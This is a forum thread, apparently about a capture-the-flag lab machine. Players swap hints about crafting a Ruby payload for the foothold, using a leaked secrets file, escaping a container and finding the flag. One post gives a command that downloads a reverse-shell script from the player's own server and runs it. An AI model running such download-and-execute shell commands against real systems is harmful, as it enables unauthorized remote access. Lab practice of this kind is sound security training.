Official Laboratory Discussion

This box made me sweat, there are still some mysteries that I have not solved, why some payload works for one person is not the other …

I spent a lot of time setting up the env

it is not an easy box for me

if you need help PM

Yikes, this is not an easy box for me.

I thought I had some plain ruby working for generating the payload, but it’s just not accepted. The ‘other’ more convoluted doc*** route has also failed to generate a payload which works.

Hint for those struggling with a foothold: If you get a “Something went wrong” error, try a different bin

What i suggest for those with payload problems is: Download a shell script from your local python http.server to perform the reverse shell, special symbols may cause problems

this approach got me good: wget “yourserver/rev.sh” && chmod +x rev.sh && ./rev.sh

trying the bash rev shell directly did not worked for me and the one i said above was reliable all the times (used it like 6 times due to resets and stuff)

Having zero luck getting the payload to hit a local web server. This one has bested me.

Type your comment> @trcm said:

Having zero luck getting the payload to hit a local web server. This one has bested me.

how you generating it??

I tried step by step with the h_c_eron_ page, and I also tried crafting a standalone ruby script.

Ahha, progress. I had to add “–timeout=3 --tries=1” as wget wasn’t reaching my web service and was executing in place on the rails console borking the erb instance it seems.

rooted. the hardest part was finding the foothold. thanks @siurana for the nudge. after finding an article with the right path, the rest was straightforward. thanks @0xc45 for a fun box!

alright i think i know the vulnerability but can someone help me with how to exploit it

I can’t for the life of me find the user flag, I’ve been searching for over 4 hours. Any nudges?

@msimonelli said:

I can’t for the life of me find the user flag, I’ve been searching for over 4 hours. Any nudges?

You’re probably not in the ‘right’ machine yet! You know some users, check where you are and what you can do from there

Foothold was really painful. SomeONE helped and guided me with a lot of patience, thank you very much, once again.

But watch it yourself, we documented this process very thoroughly:

That was just foothold. After that things got better.

@iHeyHey said:

@msimonelli said:

I can’t for the life of me find the user flag, I’ve been searching for over 4 hours. Any nudges?

You’re probably not in the ‘right’ machine yet! You know some users, check where you are and what you can do from there

I got it, cheers

can someone give any nudge about user? i’m currently in c*******r but don’t know how to escape. is it needed to use exploit or something else ?

Type your comment> @Skyr00 said:

can someone give any nudge about user? i’m currently in c*******r but don’t know how to escape. is it needed to use exploit or something else ?

DM’d you

i got sec***.yml have all the keys how and where to use that. can anyone help please

I got a shell and I’m in the c*******r but I don’t know that to do. Can someone PM me?

Type your comment> @mrg3ntl3m4n said:

I got a shell and I’m in the c*******r but I don’t know that to do. Can someone PM me?

did you use sec***.yml key to get the shell?

People will find this box a lot easier when they stop thinking of it as a ‘G*****’ exercise and start thinking of it as a Google exercise :smile: